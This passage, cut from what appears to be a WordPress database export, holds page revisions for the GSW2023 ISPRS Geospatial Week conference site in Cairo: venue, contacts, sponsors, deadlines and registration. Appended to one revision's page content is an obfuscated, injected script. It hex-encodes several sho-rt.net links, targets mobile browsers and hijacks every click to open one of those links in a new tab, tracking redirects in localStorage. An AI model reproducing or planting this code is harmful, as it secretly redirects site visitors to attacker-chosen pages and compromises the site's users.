btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-22 12:40:50','2023-04-22 12:40:50','',3066,'https://gsw2023.com/?p=4092',0,'revision','',0),
(4093,1,'2023-04-22 12:42:41','2023-04-22 12:42:41','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1682167355428{margin-top: 20px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1682167065507{margin-top: -50px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and 